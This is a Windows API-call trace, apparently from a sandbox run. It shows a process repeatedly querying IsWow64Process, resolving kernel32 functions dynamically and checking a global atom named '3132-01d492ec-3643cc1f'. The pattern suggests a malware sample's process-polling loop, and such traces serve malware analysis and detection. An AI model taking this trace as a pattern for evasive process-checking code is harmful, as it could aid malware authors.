	[0140.259] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.259] CloseHandle (hObject=0x2dc) returned 1
	[0140.259] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.259] CloseHandle (hObject=0x2dc) returned 1
	[0140.259] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.259] CloseHandle (hObject=0x2dc) returned 1
	[0140.260] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.260] CloseHandle (hObject=0x2dc) returned 1
	[0140.260] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.260] CloseHandle (hObject=0x2dc) returned 1
	[0140.260] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.260] CloseHandle (hObject=0x2dc) returned 1
	[0140.260] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.260] CloseHandle (hObject=0x2dc) returned 1
	[0140.261] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.261] CloseHandle (hObject=0x2dc) returned 1
	[0140.261] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.261] CloseHandle (hObject=0x2dc) returned 1
	[0140.261] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.261] CloseHandle (hObject=0x2dc) returned 1
	[0140.261] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.261] CloseHandle (hObject=0x2dc) returned 1
	[0140.262] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.262] CloseHandle (hObject=0x2dc) returned 1
	[0140.262] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.262] CloseHandle (hObject=0x2dc) returned 1
	[0140.262] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.262] CloseHandle (hObject=0x2dc) returned 1
	[0140.262] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.262] CloseHandle (hObject=0x2dc) returned 1
	[0140.263] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.263] CloseHandle (hObject=0x2dc) returned 1
	[0140.263] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.263] CloseHandle (hObject=0x2dc) returned 1
	[0140.263] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.263] CloseHandle (hObject=0x2dc) returned 1
	[0140.263] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.263] CloseHandle (hObject=0x2dc) returned 1
	[0140.264] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.264] CloseHandle (hObject=0x2dc) returned 1
	[0140.264] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.264] CloseHandle (hObject=0x2dc) returned 1
	[0140.264] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.265] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0140.265] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0140.265] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.265] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0140.265] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.266] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0140.266] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0140.266] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0140.266] CloseHandle (hObject=0x2dc) returned 1
	[0140.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0140.266] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.266] CloseHandle (hObject=0x2dc) returned 1
	[0140.266] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.266] CloseHandle (hObject=0x2dc) returned 1
	[0140.267] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.267] CloseHandle (hObject=0x2dc) returned 1
	[0140.267] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.267] CloseHandle (hObject=0x2dc) returned 1
	[0140.267] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.267] CloseHandle (hObject=0x2dc) returned 1
	[0140.300] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.300] CloseHandle (hObject=0x2dc) returned 1
	[0140.300] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.300] CloseHandle (hObject=0x2dc) returned 1
	[0140.300] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.301] CloseHandle (hObject=0x2dc) returned 1
	[0140.301] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.301] CloseHandle (hObject=0x2dc) returned 1
	[0140.301] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.301] CloseHandle (hObject=0x2dc) returned 1
	[0140.301] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.301] CloseHandle (hObject=0x2dc) returned 1
	[0140.301] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.301] CloseHandle (hObject=0x2dc) returned 1
	[0140.302] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.302] CloseHandle (hObject=0x2dc) returned 1
	[0140.302] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.302] CloseHandle (hObject=0x2dc) returned 1
	[0140.302] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.302] CloseHandle (hObject=0x2dc) returned 1
	[0140.302] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.303] CloseHandle (hObject=0x2dc) returned 1
	[0140.303] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.303] CloseHandle (hObject=0x2dc) returned 1
	[0140.303] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.303] CloseHandle (hObject=0x2dc) returned 1
	[0140.303] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.303] CloseHandle (hObject=0x2dc) returned 1
	[0140.304] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.304] CloseHandle (hObject=0x2dc) returned 1
	[0140.304] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.304] CloseHandle (hObject=0x2dc) returned 1
	[0140.304] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.304] CloseHandle (hObject=0x2dc) returned 1
	[0140.304] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.304] CloseHandle (hObject=0x2dc) returned 1
	[0140.305] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.305] CloseHandle (hObject=0x2dc) returned 1
	[0140.305] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.305] CloseHandle (hObject=0x2dc) returned 1
	[0140.305] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.305] CloseHandle (hObject=0x2dc) returned 1
	[0140.305] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.305] CloseHandle (hObject=0x2dc) returned 1
	[0140.306] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.306] CloseHandle (hObject=0x2dc) returned 1
	[0140.306] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.306] CloseHandle (hObject=0x2dc) returned 1
	[0140.306] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.306] CloseHandle (hObject=0x2dc) returned 1
	[0140.306] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.306] CloseHandle (hObject=0x2dc) returned 1
	[0140.307] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.307] CloseHandle (hObject=0x2dc) returned 1
	[0140.307] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.307] CloseHandle (hObject=0x2dc) returned 1
	[0140.307] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.307] CloseHandle (hObject=0x2dc) returned 1
	[0140.307] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.307] CloseHandle (hObject=0x2dc) returned 1
	[0140.308] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.308] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0140.308] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0140.308] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.309] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0140.309] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.309] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0140.309] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0140.309] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0140.309] CloseHandle (hObject=0x2dc) returned 1
	[0140.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0140.310] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.310] CloseHandle (hObject=0x2dc) returned 1
	[0140.310] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.310] CloseHandle (hObject=0x2dc) returned 1
	[0140.310] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.310] CloseHandle (hObject=0x2dc) returned 1
	[0140.310] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.310] CloseHandle (hObject=0x2dc) returned 1
	[0140.311] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.311] CloseHandle (hObject=0x2dc) returned 1
	[0140.343] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.343] CloseHandle (hObject=0x2dc) returned 1
	[0140.344] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.344] CloseHandle (hObject=0x2dc) returned 1
	[0140.344] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.344] CloseHandle (hObject=0x2dc) returned 1
	[0140.344] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.344] CloseHandle (hObject=0x2dc) returned 1
	[0140.344] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.344] CloseHandle (hObject=0x2dc) returned 1
	[0140.345] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.345] CloseHandle (hObject=0x2dc) returned 1
	[0140.345] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.345] CloseHandle (hObject=0x2dc) returned 1
	[0140.345] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.345] CloseHandle (hObject=0x2dc) returned 1
	[0140.345] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.345] CloseHandle (hObject=0x2dc) returned 1
	[0140.346] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.346] CloseHandle (hObject=0x2dc) returned 1
	[0140.346] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.346] CloseHandle (hObject=0x2dc) returned 1
	[0140.346] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.346] CloseHandle (hObject=0x2dc) returned 1
	[0140.346] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.346] CloseHandle (hObject=0x2dc) returned 1
	[0140.347] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.347] CloseHandle (hObject=0x2dc) returned 1
	[0140.347] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.347] CloseHandle (hObject=0x2dc) returned 1
	[0140.347] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.347] CloseHandle (hObject=0x2dc) returned 1
	[0140.347] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.347] CloseHandle (hObject=0x2dc) returned 1
	[0140.348] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.348] CloseHandle (hObject=0x2dc) returned 1
	[0140.348] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.348] CloseHandle (hObject=0x2dc) returned 1
	[0140.348] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.348] CloseHandle (hObject=0x2dc) returned 1
	[0140.348] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.348] CloseHandle (hObject=0x2dc) returned 1
	[0140.349] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.349] CloseHandle (hObject=0x2dc) returned 1
	[0140.349] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.349] CloseHandle (hObject=0x2dc) returned 1
	[0140.349] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.349] CloseHandle (hObject=0x2dc) returned 1
	[0140.349] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.349] CloseHandle (hObject=0x2dc) returned 1
	[0140.350] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.350] CloseHandle (hObject=0x2dc) returned 1
	[0140.350] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.350] CloseHandle (hObject=0x2dc) returned 1
	[0140.350] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.350] CloseHandle (hObject=0x2dc) returned 1
	[0140.350] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.350] CloseHandle (hObject=0x2dc) returned 1
	[0140.351] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.351] CloseHandle (hObject=0x2dc) returned 1
	[0140.351] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.351] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0140.351] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0140.352] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.352] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0140.352] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.352] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0140.352] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0140.352] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0140.352] CloseHandle (hObject=0x2dc) returned 1
	[0140.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0140.353] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.353] CloseHandle (hObject=0x2dc) returned 1
	[0140.353] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.353] CloseHandle (hObject=0x2dc) returned 1
	[0140.353] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.353] CloseHandle (hObject=0x2dc) returned 1
	[0140.354] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.354] CloseHandle (hObject=0x2dc) returned 1
	[0140.354] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.354] CloseHandle (hObject=0x2dc) returned 1
	[0140.387] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.387] CloseHandle (hObject=0x2dc) returned 1
	[0140.387] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.387] CloseHandle (hObject=0x2dc) returned 1
	[0140.388] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.388] CloseHandle (hObject=0x2dc) returned 1
	[0140.388] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.388] CloseHandle (hObject=0x2dc) returned 1
	[0140.388] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.388] CloseHandle (hObject=0x2dc) returned 1
	[0140.388] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.388] CloseHandle (hObject=0x2dc) returned 1
	[0140.389] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.389] CloseHandle (hObject=0x2dc) returned 1
	[0140.389] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.389] CloseHandle (hObject=0x2dc) returned 1
	[0140.389] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.389] CloseHandle (hObject=0x2dc) returned 1
	[0140.389] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.389] CloseHandle (hObject=0x2dc) returned 1
	[0140.390] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.390] CloseHandle (hObject=0x2dc) returned 1
	[0140.390] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.390] CloseHandle (hObject=0x2dc) returned 1
	[0140.390] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.390] CloseHandle (hObject=0x2dc) returned 1
	[0140.390] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.390] CloseHandle (hObject=0x2dc) returned 1
	[0140.390] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.391] CloseHandle (hObject=0x2dc) returned 1
	[0140.391] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.391] CloseHandle (hObject=0x2dc) returned 1
	[0140.391] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.391] CloseHandle (hObject=0x2dc) returned 1
	[0140.391] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.391] CloseHandle (hObject=0x2dc) returned 1
	[0140.391] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.392] CloseHandle (hObject=0x2dc) returned 1
	[0140.392] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.392] CloseHandle (hObject=0x2dc) returned 1
	[0140.392] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.392] CloseHandle (hObject=0x2dc) returned 1
	[0140.392] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.392] CloseHandle (hObject=0x2dc) returned 1
	[0140.392] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.392] CloseHandle (hObject=0x2dc) returned 1
	[0140.393] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.393] CloseHandle (hObject=0x2dc) returned 1
	[0140.393] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.393] CloseHandle (hObject=0x2dc) returned 1
	[0140.393] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.394] CloseHandle (hObject=0x2dc) returned 1
	[0140.394] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.394] CloseHandle (hObject=0x2dc) returned 1
	[0140.394] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.394] CloseHandle (hObject=0x2dc) returned 1
	[0140.394] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.394] CloseHandle (hObject=0x2dc) returned 1
	[0140.394] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.395] CloseHandle (hObject=0x2dc) returned 1
	[0140.395] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.395] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0140.395] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0140.396] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.396] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0140.396] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0140.396] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0140.396] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0140.396] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0140.397] CloseHandle (hObject=0x2dc) returned 1
	[0140.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0140.397] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.397] CloseHandle (hObject=0x2dc) returned 1
	[0140.397] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.397] CloseHandle (hObject=0x2dc) returned 1
	[0140.397] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.398] CloseHandle (hObject=0x2dc) returned 1
	[0140.398] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.398] CloseHandle (hObject=0x2dc) returned 1
	[0140.398] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.398] CloseHandle (hObject=0x2dc) returned 1
	[0140.431] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.431] CloseHandle (hObject=0x2dc) returned 1
	[0140.431] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.431] CloseHandle (hObject=0x2dc) returned 1
	[0140.432] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.432] CloseHandle (hObject=0x2dc) returned 1
	[0140.432] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0140.432] CloseHandle (hObject=0x2dc) returned 1
